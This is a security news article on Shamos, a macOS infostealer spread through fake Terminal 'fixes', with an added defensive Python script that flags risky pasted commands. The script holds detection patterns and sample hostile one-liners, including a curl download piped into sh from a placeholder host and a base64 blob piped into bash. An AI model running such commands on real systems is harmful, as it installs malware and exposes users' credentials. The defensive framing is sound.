Mac Users Beware: New Shamos Malware Uses Fake Fixes to Steal Sensitive Data

Cybersecurity experts have identified a new malicious campaign targeting Mac users worldwide. The malware, dubbed Shamos, is a sophisticated variant of the Atomic macOS Stealer (AMOS), and is believed to have been developed by a cybercriminal group known as COOKIE SPIDER. This threat exploits users’ trust by disguising itself as legitimate troubleshooting assistance, making it a rising concern for Apple device owners.
How Shamos Tricks Mac Users with Fake Fixes
The attack technique, known as ClickFix, preys on users searching for solutions to common Mac issues. Victims are directed to counterfeit websites or GitHub repositories that mimic official support pages. These sites prompt users to copy a single line of code into the Terminal app, claiming to fix errors. However, executing this command silently downloads Shamos, evades macOS Gatekeeper protections, and installs malicious components without detection.
What Does Shamos Do Once Inside?
After infiltration, Shamos scans the system for sensitive information, including Apple Notes, stored passwords in Keychain, browser credentials, and even cryptocurrency wallets. The malware compresses the stolen data and transmits it directly to cybercriminals. It is often accompanied by additional malicious payloads such as botnet modules or fake wallet applications, further compromising the user’s security.
Deceptive Websites and How They Operate
Fake tech support sites like mac-safer[.]com or rescue-mac[.]com distribute these malicious “fixes” through malvertising campaigns. These pages are designed to appear as trustworthy troubleshooting guides and often rank high in search results for queries like “how to flush resolver cache.” They instruct users to run dangerous Bash scripts that can extract passwords, disable security measures, and launch the Shamos malware, which can set itself up to restart with the system so that it keeps control across reboots.
Protecting Your Mac from Evolving Threats
To avoid falling victim to Shamos and similar malware, users should exercise caution before executing commands found online. If a command appears on a website, forum, or GitHub, verify its safety through official Apple support resources or reputable tech communities. Always be skeptical of sponsored search results that promote dubious troubleshooting sites, as these are often malicious traps.
While GitHub is a valuable platform for developers, it also hosts malicious repositories that mimic legitimate tools. Users should scrutinize repository details such as publisher reputation, star counts, and activity history before downloading any files. Using reliable antivirus software adds an extra layer of defense by detecting suspicious activities and blocking malicious scripts before they execute.
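As an added defensive illustration (not part of the article, and not any vendor's tool): a small Python "paste guard" that flags the shapes a ClickFix one-liner usually takes, such as piping downloaded content into a shell, decoding an inline base64 blob, stripping the Gatekeeper quarantine flag, or writing to launchd folders, before the command is run. The pattern set and the trusted-host list are assumptions of this example, and the sample commands are constructed.

```python
import re

# Added example (not from the article or any vendor): a "paste guard" that
# scores a one-liner copied from a web page before it is run in Terminal.
# The patterns are constructed heuristics for the ClickFix tactic described
# above; they catch the common shapes, not every possible obfuscation.
PATTERNS = {
    # anything piped straight into a shell interpreter
    "pipe_to_shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    # inline base64 decoding hides the real URL or script from the reader
    "encoded_payload": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    # deleting/clearing extended attributes strips Gatekeeper's quarantine flag
    "quarantine_removal": re.compile(r"\bxattr\s+(?:-\S+\s+)*-(?:r?d|c|rc)\b"),
    # launchd folders or cron make a payload restart with the system
    "persistence": re.compile(
        r"LaunchAgents|LaunchDaemons|\blaunchctl\s+(?:load|bootstrap)\b|\bcrontab\b"
    ),
}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Assumption for this example: only Apple's own hosts count as trusted.
TRUSTED_SUFFIXES = ("apple.com",)
HIGH_RISK = {"pipe_to_shell", "encoded_payload", "quarantine_removal"}


def is_trusted_host(host: str) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def assess_pasted_command(cmd: str) -> dict:
    """Return the matched heuristics, untrusted hosts contacted and a verdict."""
    findings = sorted(name for name, rx in PATTERNS.items() if rx.search(cmd))
    hosts = HOST_RE.findall(cmd)
    untrusted = [h for h in hosts if not is_trusted_host(h)]
    if HIGH_RISK.intersection(findings):
        verdict = "block"
    elif findings or untrusted:
        verdict = "review"
    else:
        verdict = "ok"
    return {"verdict": verdict, "findings": findings, "untrusted_hosts": untrusted}


if __name__ == "__main__":
    # Constructed samples: the legitimate DNS-cache flush the article mentions,
    # then shapes typical of fake "fix" one-liners (hosts are placeholders).
    for sample in (
        "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",
        "curl -fsSL https://example.invalid/fix.sh | sh",
        "echo aGVsbG8= | base64 -d | bash",
    ):
        print(assess_pasted_command(sample))
```

A "block" verdict means the command should not be run on the strength of a web page alone; "review" means it touches persistence or an unknown host and deserves a second look against official Apple documentation.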
Additional Security Measures
Reducing your online footprint can help limit the impact of data theft. Data removal services can scan and eliminate your personal information from broker sites, making it more difficult for attackers to exploit data post-breach. Keeping your macOS up to date is equally important; Apple regularly releases patches that fix vulnerabilities exploited by malware like Shamos. Enable automatic updates to ensure your system always has the latest security enhancements.
Stay Vigilant and Informed
Remember, cybercriminals capitalize on urgency—be cautious when searching for quick fixes or downloading tools. If something doesn’t feel right, pause and verify through official sources. Protecting your Mac requires a combination of cautious behavior, system updates, and security tools designed to detect and block evolving threats like Shamos.